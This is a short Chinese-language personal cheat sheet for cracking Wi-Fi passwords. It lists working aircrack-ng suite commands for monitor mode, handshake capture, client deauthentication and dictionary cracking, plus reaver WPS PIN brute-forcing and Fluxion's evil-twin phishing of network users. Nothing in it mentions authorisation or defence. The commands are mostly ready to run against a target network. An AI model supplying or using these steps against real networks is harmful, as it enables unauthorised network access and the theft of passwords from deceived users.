破解wifi笔记

破解wifi密码笔记

相关指令：

• 终端输入ifconfig,查看网卡。

• airmon-ng start wlan0：把外置网卡变成监听模式,无线接口wlan0会变成wlan0mon。

• airodump-ng wlan0mon,扫描附近的wifi。

• airmon-ng stop 网卡号 ：把网卡转为正常状态

• 抓取握手包：airodump-ng -c 1 --bssid DC:FE:18:53:81:C9 -w hack wlan0mon（ -c 指定信道，-bssid指定目标路由器的BBSID，-w指定抓取的数据包保存的目录。）

• aireplay-ng -0 2 -a 连接设备的BSSID值 -c 连接设备的STATION值 wlan0mon：强制连接到wifi的设备重连路由器，以便快速抓包。（-a指定wifi热点的BSSID，-c指定要攻击设备的MAC地址。

• **破解密码代码：aircrack-ng -a2 -b MAC地址 -w /usr/share/wordlist/rockyou.txt ~/*.cap **

1.利用reaver破解

1. **wash -i wlan0mon：**直接扫描开启wps的路由器，（WPS Locked为No的就是开启wps服务的路由器，都可以尝试攻击。

2. reaver -i wlan0mon -b Mac地址 -vv ，用reaver命令傻瓜式破解指令

若成功破解出Ping码，记好，若对面改了密码，但没改ping码的话，用reaver会一下子得到密码。reaver -i 网卡 -b WIFIMAC -p ping码 -vv

2.利用fluxion

工作原理：（大体步骤）

1. 扫描能够接收到的wifi信号

2. 抓取握手包（主要目的是为了验证wifi密码是否正确）

3. 使用web接口

4. 启动一个假的AP实例来模拟原本的接入点

5. 然后会生成一个MDK3进程。如果普通用户已经连接到这个wifi，也会输入Wifi密码

6. 随后启动一个模拟的DNS服务器并且抓取所有的DNS请求，并且会把这些请求重新定向到一个含有恶意脚本的HOST地址

7. 随后会弹出一个窗口提示用户输入正确的Wifi密码

8. 用户输入的密码将和第二步抓到的握手包作比较来核实密码是否正确。

9. 这个程序自动化运行

下载完fluxion,运行./fluxion

在fluxion里面有个脚本会自动检测所缺少的插件：./Insrall.sh

3.暴力破解

Kali linux本身有默认的字典文件，位置在/usr/share/wordlists。